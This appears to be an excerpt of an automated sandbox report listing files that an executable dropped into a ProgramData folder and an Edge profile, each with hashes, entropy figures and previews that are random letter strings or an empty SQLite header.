SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\IIDHJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\AFIDGDBGCAAF\IIDHJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\IJJKKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\JDAFIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\AFIDGDBGCAAF\JDBKJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\AFIDGDBGCAAF\JJEGCB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\JJKEBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\ProgramData\AFIDGDBGCAAF\JKFCBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\KEBFBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\KJDGIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\0011e39b-6a66-49db-a2d2-b06238965b44.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46233
Entropy (8bit):	6.088570062977425
Encrypted:	false
SSDEEP:	768:lMkbJrT8IeQc5kXEV6LmZ7kaI/dDCscGsIQmxgxC1onwWE7RTupzKscDX//Nql:lMk1rT8HcXMHIQ9IonoRTuiK
MD5:	8634DBC549938F23A00631CE6C949D00
SHA1:	03C9BDA3E6A651E0FD00F434686B1976A7EA11F4
SHA-256:	7A47B3E6F1A473B896DE484E6ADE257F0C381B58D1345256F81F8179900C394D
SHA-512:	7B5BCF16FBA912151D56A512F2E74C01A529C5AE6C4CA60159087A40DDF38774AF2D3D49D1E3679976F364D45BDACE6BB0404E63A519E33BF194278B35197DDC
Malicious:	false
